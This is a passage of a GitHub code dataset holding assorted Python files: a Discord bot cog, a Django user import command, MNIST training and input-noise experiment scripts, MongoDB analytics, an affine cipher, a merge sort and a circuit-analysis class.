\"+osinfo)\nprint(\"Kernel / Version: \"+oskinfo)\nprint(\"IP v4 Addr: \"+ipv4info)\nprint(\"IP v6 Addr: \"+ipv6info)\nprint(\"Hardware info\")\nprint(\"Serial number: \"+serialnmbr)\nprint(\"Product manufacturer: \"+prodman)\nprint(\"Product name: \"+prodname)\n\ninv = {}\n\ninv = {\n 'hostname': hostname,\n 'cpu': cpuinfo,\n 'memory': meminfo,\n 'disks': diskinfo,\n 'os': osinfo,\n 'krnl': oskinfo,\n 'ipv4': ipv4info,\n 'ipv6': ipv6info,\n 'psn': serialnmbr,\n 'pmanufacturer': prodman,\n 'pname': prodname\n}\n\nwith open('story.json', 'w') as outfile:\n json.dump(inv, outfile)\n","repo_name":"storyteller-lab/story-teller","sub_path":"get_the_story.py","file_name":"get_the_story.py","file_ext":"py","file_size_in_byte":2676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"30981164875","text":"import discord\r\nfrom discord.ext import commands\r\n\r\n\r\n\r\n# \"\"\"music commands for Plaryboat\r\n# credits to Lucas Kumara for all heads up\"\"\"\r\n\r\nclass Music:\r\n def __init__(self, bot): #self and the bot variable\r\n self.bot = bot\r\n\r\n async def on_message_delete(self,message):\r\n print('message deleted')\r\n\r\n\r\n @commands.command()\r\n async def oof(self):\r\n await self.bot.say('pong')\r\n\r\ndef setup(bot):\r\n bot.add_cog(Music(bot))\r\n","repo_name":"Plaryy/plarybot","sub_path":"cogs/Music.py","file_name":"Music.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12755419506","text":"from django.core.management.base import BaseCommand, CommandError\nfrom recosys.models import User\n\n# -*- coding: utf_8 -*-\nfrom itertools import islice\n\n\nclass Command(BaseCommand):\n args = \"\"\n help = \"Add Users from a text file\"\n\n def handle(self, *args, **options):\n if len(args) == 0:\n raise CommandError('No input file given')\n user_list = args[0]\n n = 10000\n counter = 0\n with open(user_list) as f:\n while True:\n next_n_lines = list(islice(f,n))\n if not next_n_lines:\n break\n for line in next_n_lines:\n all_iterms = line.split()\n index = all_iterms[0]\n if len(all_iterms) > 1:\n name = all_iterms[1]\n else:\n name = \"user\"+str(counter)\n q = User.objects.create_user(index, name)\n q.save()\n counter += 1\n self.stdout.write('Successfully added %d Users' % counter)\n","repo_name":"juxj/recommend_movie_site","sub_path":"recosys/management/commands/read_users.py","file_name":"read_users.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"6661501576","text":"import pandas as pd\nimport numpy as np\n\ndef sum_of_ects(courses_df):\n sum_ects = courses_df['ECTS'].sum()\n return sum_ects\n\ndef sum_of_sst(courses_df):\n sum_sst = courses_df['SSt.'].sum()\n return sum_sst\n \nif __name__ == \"__main__\": \n ects_df = pd.read_csv('ects.csv')\n print(ects_df)\n\n # print sum of ects\n sum_ects = sum_of_ects(ects_df)\n print(f'You have {sum_ects:.0f} ECTS in total.')\n\n # print ects of semesters\n # fehlt\n\n # print sum of SSt. \n sum_sst = sum_of_sst(ects_df)\n print(f'You have {sum_sst:.0f} semester hours in total.')\n\n # print spacer\n print('-')\n\n # print average of ects\n number_of_rows = ects_df.shape[0]-1\n print(f'The number of classes, in which {sum_ects:.0f} ects have been acquired, is {number_of_rows:.0f}.')\n average_ects = sum_ects/number_of_rows\n print(f'On average you have acquired {average_ects:.2f} ects per class.')\n \n\n\n ","repo_name":"matthiaseigner/devcamp","sub_path":"python/lesson_1/e_07_main.py","file_name":"e_07_main.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38311597798","text":"import torch\nfrom torch import nn\nfrom torch.utils.data import DataLoader\nfrom torchvision import datasets\nfrom torchvision.transforms import ToTensor, Resize, Compose\nimport numpy as np\nimport random\n\n# Set the random seed for PyTorch\nseed = 42\ntorch.manual_seed(seed)\n\n# Set the random seed for CUDA (if available)\nif torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n# Set the random seed for Python's built-in random module\nrandom.seed(seed)\n\n# Set the random seed for NumPy\nnp.random.seed(seed)\n\n# Enable deterministic behavior in CuDNN (if available)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nsize = (14,14)\n\ntransform = Compose([Resize(size), ToTensor()])\n\n# Download training data from open datasets.\ntraining_data = datasets.MNIST(\n root=\"data\",\n train=True,\n download=True,\n transform=transform,\n)\n\n# Download test data from open datasets.\ntest_data = datasets.MNIST(\n root=\"data\",\n train=False,\n download=True,\n transform=transform,\n)\n\nbatch_size = 64\n\n# Create data loaders.\ntrain_dataloader = DataLoader(training_data, batch_size=batch_size)\ntest_dataloader = DataLoader(test_data, batch_size=batch_size)\n\nfor X, y in test_dataloader:\n print(f\"Shape of X [N, C, H, W]: {X.shape}\")\n print(f\"Shape of y: {y.shape} {y.dtype}\")\n break\n\n\n# Get cpu, gpu or mps device for training.\ndevice = (\n \"cuda\"\n if torch.cuda.is_available()\n else \"mps\"\n if torch.backends.mps.is_available()\n else \"cpu\"\n)\nprint(f\"Using {device} device\")\n\n\nclass Classifier(torch.nn.Module):\n def __init__(self, **kwargs):\n super(Classifier, self).__init__()\n self.neurons = size[0] * size[1]\n self.fc1 = torch.nn.Linear(self.neurons, 16)\n self.fc2 = torch.nn.Linear(16, 10)\n\n def forward(self, x):\n x = self.fc1(x.view(-1, self.neurons))\n x = torch.relu(x)\n x = self.fc2(x)\n return x\n\n\nmodel = Classifier().to(device)\nprint(model)\n\n\nloss_fn = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=1e-3)\n\n\ndef train(dataloader, model, loss_fn, optimizer):\n size = len(dataloader.dataset)\n model.train()\n for batch, (X, y) in enumerate(dataloader):\n X, y = X.to(device), y.to(device)\n\n # Compute prediction error\n pred = model(X)\n loss = loss_fn(pred, y)\n\n # Backpropagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if batch % 100 == 0:\n loss, current = loss.item(), (batch + 1) * len(X)\n print(f\"loss: {loss:>7f} [{current:>5d}/{size:>5d}]\")\n\n\ndef test(dataloader, model, loss_fn):\n size = len(dataloader.dataset)\n num_batches = len(dataloader)\n model.eval()\n test_loss, correct = 0, 0\n with torch.no_grad():\n for X, y in dataloader:\n X, y = X.to(device), y.to(device)\n pred = model(X)\n test_loss += loss_fn(pred, y).item()\n correct += (pred.argmax(1) == y).type(torch.float).sum().item()\n test_loss /= num_batches\n correct /= size\n print(\n f\"Test Error: \\n Accuracy: {(100*correct):>0.1f}%, Avg loss: {test_loss:>8f} \\n\"\n )\n\n\nepochs = 5\nfor t in range(epochs):\n print(f\"Epoch {t+1}\\n-------------------------------\")\n train(train_dataloader, model, loss_fn, optimizer)\n test(test_dataloader, model, loss_fn)\nprint(\"Done!\")\n\n\ntorch.save(model.state_dict(), \"./model.pth\")\nprint(\"Saved PyTorch Model State to model.pth\")\n","repo_name":"berendjan/zk-neural-network","sub_path":"python/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"27464449919","text":"import asyncio\nimport time\nfrom asyncio import Future\n\n\nasync def world():\n await asyncio.sleep(4)\n print(\"world\")\n return \"world\"\n\n\ndef hello():\n print(\"hello\")\n t = asyncio.create_task(world())\n while not t.done():\n continue\n print(t.result())\n print(\"world completed\")\n\n\nasync def do_exit():\n print(\"do exit....\")\n await asyncio.sleep(4)\n\n\nasync def main():\n print(\"main\")\n hello()\n await do_exit()\n\nasyncio.run(main())\n","repo_name":"onsunsl/onsunsl.github.io","sub_path":"note/demo/async/sync_call_async.py","file_name":"sync_call_async.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72206971099","text":"#-------------------------------------------------------------------------\n# 程序:users_behavior\n# 日期:2018.4.12\n# 功能:获取特定行为的数据\n#-------------------------------------------------------------------------\nimport sys\nimport os\n\nPACKAGE_PARENT = '..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom pymongo import MongoClient\nimport time, datetime\nimport pandas, numpy\nimport os, csv, re\nimport matplotlib.pyplot as plt\nfrom sparrow.tools import get_datetime, get_timestamp, write_csv\n\nsource_data_path = 'D:/sparrow_data/'\nfile_save_path = 'D:/sparrow_data/main_analysis/'\n\nclass Mongo:\n def __init__(self):\n self.client = MongoClient('localhost', 27017)\n self.db = self.client.sparrow_main\n self.all_users = self.db.users\n self.users_login_log = self.db.login_log\n self.apple_pay = self.db.apple_iap_log\n self.daily_data = self.db.daily_deal_data\n self.third_pay = self.db.recharge_orders\n self.daily_task_log = self.db.daily_task_log\n\n self.db2 = self.client.sparrow_analysis\n\nclass UserPayAnalysis:\n def __init__(self, off_day, pic_name, csv_name):\n self.pic_name = pic_name\n self.csv_name = csv_name\n self.off_day = off_day\n self.time_today = time.time()\n self.st_year, self.st_month, self.st_day = int(\n time.strftime('%Y', time.localtime(self.time_today - 86400 * (self.off_day + 2)))), int(\n time.strftime('%m', time.localtime(self.time_today - 86400 * (self.off_day + 2)))), int(\n time.strftime('%d', time.localtime(self.time_today - 86400 * (self.off_day + 2))))\n self.end_year, self.end_month, self.end_day = int(\n time.strftime('%Y', time.localtime(self.time_today - 86400 * (self.off_day + 1)))), int(\n time.strftime('%m', time.localtime(self.time_today - 86400 * (self.off_day + 1)))), int(\n time.strftime('%d', time.localtime(self.time_today - 86400 * (self.off_day + 1))))\n # 用户付费行为分析\n def user_pay_data(self):\n csv_head = ['user_id', 'user_regist_date', '当日付费', '3天付费', '7天付费', '14天付费']\n # users = mongo.all_users.find({'username':{'$regex':r'^(?!robot_[0-9]{5})'}})\n users = mongo.all_users.find({'regist_date':{\"$gte\":datetime.datetime(self.st_year, self.st_month, self.st_day, 0, 0)}})\n data = []\n for user in users:\n save_data = {}\n save_data['user_id'] = str(user['_id'])\n save_data['user_regist_date'] = user['regist_date']\n # 注册后一定日期内付费\n query_list = [[0, 1], [1, 3], [3, 7], [7, 14]]\n for query_days in query_list:\n st_date_timestamp = get_timestamp(save_data['user_regist_date'].year,\n save_data['user_regist_date'].month,\n save_data['user_regist_date'].day,\n save_data['user_regist_date'].hour)\n st_date = get_datetime(st_date_timestamp, -query_days[0])\n end_date = get_datetime(st_date_timestamp, -query_days[1])\n pay_data = self.get_user_pay_log({'user_id': save_data['user_id']}, st_date=st_date, end_date=end_date)\n save_data[csv_head[query_list.index(query_days)+2]] = [[pay_data['third_pay_count'] + pay_data['apple_pay_count']],\n [pay_data['third_pay_amount'] + pay_data['apple_pay_amount']]]\n data.append(save_data)\n #写入文件\n file_path = file_save_path + '{}.csv'.format(self.csv_name)\n write_csv(file_path, head=csv_head, keys=csv_head, data=data)\n\n # 获取某个id的支付\n def get_user_pay_log(self, user_id:dict, st_date, end_date):\n print(user_id)\n pay_data = {}\n third_pay_log = mongo.third_pay.aggregate(\n [\n {'$match':{'pay_date':{\"$gte\":datetime.datetime(st_date[0],st_date[1],st_date[2],0,0),\n '$lte':datetime.datetime(end_date[0],end_date[1],end_date[2],0,0)},\n 'paid':True, 'source':user_id['user_id']}},\n {'$group':{'_id':'', 'pay_count':{'$sum':1}, 'pay_amount':{'$sum':'$price'}}}\n ]\n )\n try:\n third_pay_log_list = list(third_pay_log)[0]\n pay_data['third_pay_count'] = third_pay_log_list['pay_count']\n pay_data['third_pay_amount'] = third_pay_log_list['pay_amount']\n except:\n pay_data['third_pay_count'], pay_data['third_pay_amount'] = 0, 0\n\n\n apple_pay_log = mongo.apple_pay.aggregate(\n [\n {'$match': {'date': {\"$gte\": datetime.datetime(st_date[0], st_date[1], st_date[2], 0, 0),\n '$lte': datetime.datetime(end_date[0], end_date[1], end_date[2], 0, 0)},\n 'source':user_id['user_id']}},\n {'$group': {'_id': '', 'pay_count': {'$sum': 1}, 'pay_amount': {'$sum': '$price'}}}\n ]\n )\n try:\n apple_pay_log_list = list(apple_pay_log)[0]\n pay_data['apple_pay_count'] = apple_pay_log_list['pay_count']\n pay_data['apple_pay_amount'] = apple_pay_log_list['pay_amount']\n except:\n pay_data['apple_pay_count'], pay_data['apple_pay_amount'] = 0, 0\n print(pay_data)\n return pay_data\n\n def user_pay_analysis(self):\n csv_head = ['user_id', 'user_regist_date', '当日付费', '3天付费', '7天付费', '14天付费']\n data = pandas.read_csv(file_save_path + '{}.csv'.format(self.csv_name))\n fig = plt.figure()\n ax1 = fig.add_subplot(211)\n pay_user_count, pay_amount = [0]*4, [0]*4\n for row in range(0, data.shape[0]):\n for head in csv_head[2:]:\n if int(re.findall(r'\\[\\[(.*)\\], \\[(.*)\\]\\]', data.ix[row, head])[0][0]) > 0:\n pay_user_count[csv_head.index(head)-2] += 1\n pay_amount[csv_head.index(head)-2] += round(float(re.findall(r'\\[\\[(.*)\\], \\[(.*)\\]\\]', data.ix[row, head])[0][1]))\n pay_proportion = numpy.array(pay_user_count) / data.shape[0]\n pay_average = numpy.array(pay_amount) / numpy.array(pay_user_count) / 100\n ax1.bar(numpy.arange(len(pay_proportion)), pay_proportion, tick_label=csv_head[2:], width=0.2, color='blueviolet')\n ax1.set_ylabel('付费率')\n ax11 = ax1.twinx()\n ax11.plot(numpy.arange(len(pay_proportion)), pay_average, color='plum')\n ax11.set_ylabel('平均付费金额')\n for i in range(0, len(pay_proportion)):\n try:\n ax11.text(i, pay_average[i], int(pay_average[i]))\n except:\n ax11.text(i, pay_average[i], 0)\n ax1.text(i-0.05 ,pay_proportion[i]+0.001, '%.2f%%' %(pay_proportion[i]*100))\n pic_path = file_save_path+'{}.jpg'.format(self.pic_name)\n plt.savefig(pic_path)\n plt.show()\n\n def get_datetime_list(self, iso_datetime):\n return [iso_datetime.year, iso_datetime.month, iso_datetime.day, iso_datetime.hour]\n\n\n\nif __name__ == '__main__':\n mongo = Mongo()\n behaviors_analysis = UserPayAnalysis(off_day=15, pic_name='30', csv_name='30天支付')\n start_time = time.time()\n behaviors_analysis.user_pay_data()\n behaviors_analysis.user_pay_analysis()\n print(time.time()-start_time)","repo_name":"meijida258/mediaSpider","sub_path":"DA/sparrow/users_behavior.py","file_name":"users_behavior.py","file_ext":"py","file_size_in_byte":7711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42281448745","text":"from .netlist import Netlist\nfrom .netfile import NetfileMixin\n\n\n__all__ = ('Circuit', )\n\n\nclass Circuit(Netlist, NetfileMixin):\n\n \"\"\"The Circuit class is used for describing networks using\n netlists. Despite the name, it does not require a closed path.\n\n Here's an example of using the Circuit class:\n\n cct = Circuit('''\n V1 1 0 V; down\n R1 1 2 R; right\n C1 2 0_2 C; down\n W 0 0_2; right''')\n\n The directions after the semicolon are hints for drawing the\n schematic and are ignored for the circuit analysis. The last net\n is a wire to make the schematic look nice; it is not needed for\n circuit analysis. Indeed the capacitor could be connected\n directly to nodes 2 and 0.\n\n The nodes are usually numbers but can be any alphanumeric name\n including underscores. By default, nodes with underscores are not\n drawn.\n\n The circuit components are also usually numbered but again they\n can be any alphanumeric name. They can also have anonymous names,\n as for the wire in the example. Internally they are enumerated\n sequentially for each component type: W#1, W#2, etc.\n\n The circuit can be displayed using:\n >>> cct.draw()\n\n The schematic can be saved to a file using:\n >>> cct.draw('schematic.pdf')\n\n The transform domain voltages across a component can be found using:\n >>> cct.V1.V\n\n This is found using modified nodal analysis for each type of\n independent source in the circuit (AC, DC, transient, noise).\n Once this is performed, the results are cached until the network\n is modified.\n\n The transform domain currents through a component can be found using:\n >>> cct.R1.I\n\n The transform domain nodal voltages with respect to the ground node (0)\n can be found using:\n cct[2].V\n\n The time domain voltages and currents are displayed using\n lowercase attributes v and i. For example,\n >>> cct.C1.v. This is equivalent to >>> cct.C1.V(t).\n\n The impedance between nodes 2 and 0 can be found using:\n >>> Z = cct.impedance(2, 0)\n\n The open-circuit voltage between nodes 2 and 0 can be found using:\n >>> Z = cct.Voc(2, 0)\n\n The Thevenin equivalent circuit between nodes 2 and 0 can be found\n using:\n >>> thevenin = cct.Thevenin(2, 0)\n\n The s-domain model can be drawn using:\n >>> cct.s_model().draw()\n\n \"\"\"\n\n def __init__(self, filename=None, netlist=None, allow_anon=False, context=None):\n\n # Treat filename as netlist if it has a newline.\n if filename is not None and '\\n' in filename:\n super(Circuit, self).__init__(allow_anon=allow_anon,\n context=context)\n self.add(filename)\n else:\n super(Circuit, self).__init__(filename, allow_anon=allow_anon,\n context=context)\n\n if netlist is not None:\n self.add(netlist)\n","repo_name":"mph-/lcapy","sub_path":"lcapy/circuit.py","file_name":"circuit.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"69"}
+{"seq_id":"2275763360","text":"# function to find the index of a character\r\ndef indexOf(alphabet):\r\n return ord(alphabet) - 65\r\n\r\n\r\n# function to get character from an index\r\ndef getAlphabet(index):\r\n return chr(index + 65)\r\n\r\n\r\n# function to find multiplicative inverse using Extended Euclidean Algorithm\r\n# return modular multiplicative inverse of ‘x’ under modulo ‘y’\r\n# (x*k) mod y = 1 , where k is the modular multiplicative inverse of ‘x’ under modulo ‘y’\r\ndef findMultiplicativeInverse(x, y):\r\n r1 = y # larger number\r\n r2 = x # smaller number\r\n t1 = 0\r\n t2 = 1\r\n # print('q', 'r1', 'r2', 'r', 't1', 't2', 't')\r\n while r2 != 0:\r\n q = r1 // r2\r\n r = r1 % r2\r\n t = t1 - q * t2\r\n\r\n # print(q, r1, r2, r, t1, t2, t)\r\n r1 = r2\r\n r2 = r\r\n\r\n t1 = t2\r\n t2 = t\r\n if r1 == 1: # ensuring gcd is 1 for multiplicative inverse to exist\r\n return t1\r\n else:\r\n return False\r\n\r\n\r\n# function to encrypt using affine cipher\r\n# key1 -> multiplicative key\r\n# key2 -> additive key\r\n# key1 and key2 needs to be different\r\ndef encryptAffineCipher(plaintext_1, key1, key2):\r\n encryptedText = \"\"\r\n plaintext=plaintext_1.upper()\r\n for alphabet in plaintext:\r\n index = indexOf(alphabet)\r\n index = (index * key1) % 26 # key1 and 26 needs to be co-prime\r\n index = (index + key2) % 26\r\n encryptedText += getAlphabet(index)\r\n return encryptedText\r\n\r\n\r\n# function to decrypt using affine cipher\r\n# key1 -> multiplicative key\r\n# # key2 -> additive key\r\n# # key1 and key2 needs to be different\r\ndef decryptAffineCipher(encryptedText_1, key1, key2):\r\n decryptedText = \"\"\r\n encryptedText=encryptedText_1.upper()\r\n for alphabet in encryptedText:\r\n index = indexOf(alphabet)\r\n # key2 operations\r\n index = index - key2\r\n if index < 0:\r\n index += 26\r\n index %= 26\r\n # key1 operations\r\n key1MultiplicativeInverse = findMultiplicativeInverse(key1, 26)\r\n index = index * key1MultiplicativeInverse\r\n index %= 26\r\n\r\n decryptedText += getAlphabet(index)\r\n return decryptedText\r\n\r\n#Sample Input & Output.\r\nprint(\"*****ENCRYPTION******\")\r\nprint(\"SAMPLE INPUT ::\")\r\nprint(\"Plain text : HELLO\")\r\nprint(\"SAMPLE OUTPUT :: \")\r\nprint(encryptAffineCipher(\"HELLO\", 7, 2))\r\nprint()\r\nprint(\"*****DECRYPTION******\")\r\nprint(\"SAMPLE INPUT ::\")\r\nprint(\"Plain text : ZWBBW\")\r\nprint(\"SAMPLE OUTPUT :: \")\r\nprint(decryptAffineCipher(\"ZEBBW\", 7, 2))\r\nprint()\r\n\r\n#user input\r\nprint(\"*****ENCRYPTION******\")\r\nuser_input=input(\"Enter text for encrypting : \")\r\nmultiplicative_key=int(input(\"Enter the multiplicative key : \"))\r\nadditive_key=int(input(\"Enter the additive key : \"))\r\nprint(\"Your input :: \")\r\nprint(\"Plain text : \"+user_input)\r\nprint(\"Multiplicative Key : \"+str(multiplicative_key))\r\nprint(\"Additive Key : \"+str(additive_key))\r\nprint(\"Your Output ::\")\r\nprint(\"Encrypted : \", end=\" \")\r\nprint(encryptAffineCipher(user_input, multiplicative_key, additive_key))\r\n\r\nprint()\r\n\r\nprint(\"*****DECRYPTION******\")\r\nuser_input=input(\"Enter text for decrypting : \")\r\nmultiplicative_key=int(input(\"Enter the multiplicative key : \"))\r\nadditive_key=int(input(\"Enter the additive key : \"))\r\nprint(\"Your input :: \")\r\nprint(\"Plain text : \"+user_input)\r\nprint(\"Multiplicative Key : \"+str(multiplicative_key))\r\nprint(\"Additive Key : \"+str(additive_key))\r\nprint(\"Your Output ::\")\r\n\r\nprint(\"Decrypted : \", end=\" \")\r\nprint(decryptAffineCipher(user_input, multiplicative_key, additive_key))\r\nprint()","repo_name":"hemantsingh205/ASSIGNMENT_INFORMATION_SECURITY","sub_path":"Q2_Affine_Cipher.py","file_name":"Q2_Affine_Cipher.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38102990989","text":"from safe.impact_functions.core import FunctionProvider\nfrom safe.impact_functions.core import get_hazard_layer, get_exposure_layer\nfrom safe.storage.vector import Vector\nfrom safe.engine.interpolation import assign_hazard_values_to_exposure_data\n\n\nclass EarthquakeBuildingDamageFunction(FunctionProvider):\n \"\"\"Risk plugin for earthquake damage to buildings\n\n :param requires category=='hazard' and \\\n subcategory.startswith('earthquake') and \\\n layertype=='raster'\n :param requires category=='exposure' and \\\n subcategory=='structure'\n \"\"\"\n\n plugin_name = 'Earthquake Building Damage Function'\n\n @staticmethod\n def run(layers):\n \"\"\"Risk plugin for earthquake school damage\n \"\"\"\n\n # Extract data\n H = get_hazard_layer(layers) # Ground shaking\n E = get_exposure_layer(layers) # Building locations\n\n # Interpolate hazard level to building locations\n H = assign_hazard_values_to_exposure_data(H, E,\n attribute_name='MMI')\n\n # Extract relevant numerical data\n coordinates = E.get_geometry()\n shaking = H.get_data()\n\n # Calculate building damage\n building_damage = []\n for i in range(len(shaking)):\n x = float(shaking[i]['MMI'])\n if x < 6.0 or (x != x): # x != x -> check for nan pre python 2.6\n value = 0.0\n else:\n value = (0.692 * (x ** 4) -\n 15.82 * (x ** 3) +\n 135.0 * (x ** 2) -\n 509.0 * x + 714.4)\n\n building_damage.append({'DAMAGE': value, 'MMI': x})\n\n # Create new layer and return\n V = Vector(data=building_damage,\n projection=E.get_projection(),\n geometry=coordinates)\n return V\n","repo_name":"D2KG/FLOOgin","sub_path":"safe/engine/impact_functions_for_testing/unspecific_building_impact_model.py","file_name":"unspecific_building_impact_model.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"13653852736","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nclass Solution(object):\n def merge_sort(self, nums):\n answer = [] #創一個空的list\n if len(nums) <= 1: #如果list等於或小於1,就直接回傳該list\n return nums\n mid = int(len(nums)/2) #找出中間值在哪,拆解list\n left = self.merge_sort(nums[:mid]) \n right = self.merge_sort(nums[mid:])\n\n while (len(right) > 0) or (len(left) > 0):\n if len(right) > 0 and len(left) > 0: \n if right[0] > left[0]:\n answer.append(left[0])\n left.pop(0)\n else :\n answer.append(right[0])\n right.pop(0)\n elif len(right) > 0:\n for i in right:\n answer.append(i)\n right.pop(0)\n else:\n for i in left:\n answer.append(i)\n left.pop(0)\n\n return answer\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"yulin871030/my-learning-note","sub_path":"HW2/mergesort_06170131.py","file_name":"mergesort_06170131.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15633800274","text":"#!/usr/bin/env python3\n\"\"\"\nModule 11\n\"\"\"\nfrom pymongo import MongoClient\n\n\ndef get_collections():\n \"\"\"returns the documents in the given collection\"\"\"\n client = MongoClient('mongodb://127.0.0.1:27017')\n logs = client.logs.nginx\n return logs\n\n\ndef main():\n \"\"\"This is where all the work is done\n \"\"\"\n logs = get_collections()\n print('{} logs'.format(logs.count_documents({})))\n print('Methods:')\n for method in [\"GET\", \"POST\", \"PUT\", \"PATCH\", \"DELETE\"]:\n log_count = list(logs.find({'method': method})).__len__()\n print('\\tmethod {}: {}'.format(method, log_count))\n len_status = list(\n logs.find({'method': 'GET', 'path': '/status'})).__len__()\n print('{} status check'.format(len_status))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"peterchibunna/alx-backend-storage","sub_path":"0x01-NoSQL/12-log_stats.py","file_name":"12-log_stats.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"9188651673","text":"#attack.py\nimport time\nimport pdb\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport foolbox as fb\nfrom functools import partial\nfrom torchvision import datasets, transforms\n\nclass LeNet5(nn.Module):\n def __init__(self, num_classes=10):\n super(LeNet5, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 6, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(6),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.layer2 = nn.Sequential(\n nn.Conv2d(6, 16, kernel_size=5, stride=1, padding=0),\n nn.BatchNorm2d(16),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size = 2, stride = 2))\n self.fc = nn.Linear(400, 120)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(120, 84)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(84, num_classes)\n \n def forward(self, x):\n out = self.layer1(x)\n #pdb.set_trace()\n out = self.layer2(out)\n out = out.reshape(out.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n return out\n\n\nclass MLP(nn.Module):\n def __init__(self, num_classes=10):\n super(MLP, self).__init__()\n self.fc = nn.Linear(1024, 300)\n self.relu = nn.ReLU()\n self.fc1 = nn.Linear(300, 300)\n self.relu1 = nn.ReLU()\n self.fc2 = nn.Linear(300, 100)\n self.relu2 = nn.ReLU()\n self.fc3 = nn.Linear(100, num_classes)\n \n def forward(self, x):\n out = x.reshape(x.size(0), -1)\n out = self.fc(out)\n out = self.relu(out)\n out = self.fc1(out)\n out = self.relu1(out)\n out = self.fc2(out)\n out = self.relu2(out)\n out = self.fc3(out)\n return out\n\n\n\ndef load_mnist():\n \n transform=transforms.Compose([\n transforms.Resize((32,32)),\n transforms.ToTensor(),\n #transforms.Normalize((0.1307,), (0.3081,))\n ])\n train_set = datasets.MNIST('data', train=True, download=True,\n transform=transform)\n test_set = datasets.MNIST('data', train=False,\n transform=transform)\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=128, shuffle=True)\n test_loader = torch.utils.data.DataLoader(test_set, batch_size=128, shuffle=False)\n\n X_train, y_train, X_test, y_test = [], [], [], []\n for batch_idx, (img, label) in enumerate(train_loader):\n X_train.append(img)\n y_train.append(label)\n #print(batch_idx, img.shape, label.shape)\n for batch_idx, (img, label) in enumerate(test_loader):\n X_test.append(img)\n y_test.append(label)\n\n X_train = torch.cat(X_train).cuda() \n y_train = torch.cat(y_train).cuda()\n X_test = torch.cat(X_test).cuda()\n y_test = torch.cat(y_test).cuda() \n\n return X_train, y_train, X_test, y_test, train_loader, test_loader\n\ndef train(model, train_loader, name='lenet'):\n model.train()\n\n criterion = nn.CrossEntropyLoss()\n if name.lower() == 'lenet':\n optimizer = torch.optim.SGD(\n model.parameters(), \n momentum=0.9, \n lr=0.01, \n weight_decay = 0.0001\n )\n elif name.lower() == 'mlp':\n optimizer = torch.optim.Adam(\n model.parameters(), \n lr=0.001, \n weight_decay = 0.0001\n )\n \n epochs = 5\n scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, epochs)\n for epoch in range(epochs):\n for batch_idx, (X, y) in enumerate(train_loader):\n X, y = X.cuda(), y.cuda()\n pred = model(X)\n loss = criterion(pred, y)\n loss.backward()\n optimizer.step() \n optimizer.zero_grad()\n scheduler.step()\n\n print('epoch: {}, loss: {:.2f}'.format(epoch, loss.item()))\n \n return model\n\ndef test(model, test_loader):\n model.eval()\n correct, nelement = 0, 0\n for batch_idx, (X, y) in enumerate(test_loader):\n X, y = X.cuda(), y.cuda()\n pred = model(X) \n #pdb.set_trace()\n correct += (torch.argmax(pred, axis=1) == y).sum().item()\n nelement += pred.shape[0]\n\n acc = correct/nelement\n print('Acc: {:.2f}'.format(acc*100))\n\n# X: feature (numpy) [0,255], sigma=1 means total change of 0 to 5\ndef add_noise(X, sigma=0, eps=0, noise_type=None): #is_uniform=False):\n\n # add noise\n X = torch.from_numpy(X).float()\n if noise_type == 'const':\n eps_prime = 255 * eps\n X_noisy = X + eps_prime\n elif noise_type == 'unif':\n eps_prime = 255 * eps\n X_noisy = X + torch.rand_like(X) * 2 * eps_prime - eps_prime\n #pass\n elif noise_type == 'normal':\n noise = torch.randn_like(X)\n max_val = noise.abs().max()\n noise = noise/max_val * (255 * eps)\n #pdb.set_trace()\n print(noise.abs().max())\n X_noisy = X + noise\n elif noise_type == 'sign':\n eps_prime = 255 * eps\n noise = eps_prime * (2 * torch.bernoulli(torch.ones_like(X)*0.5) - 1) \n 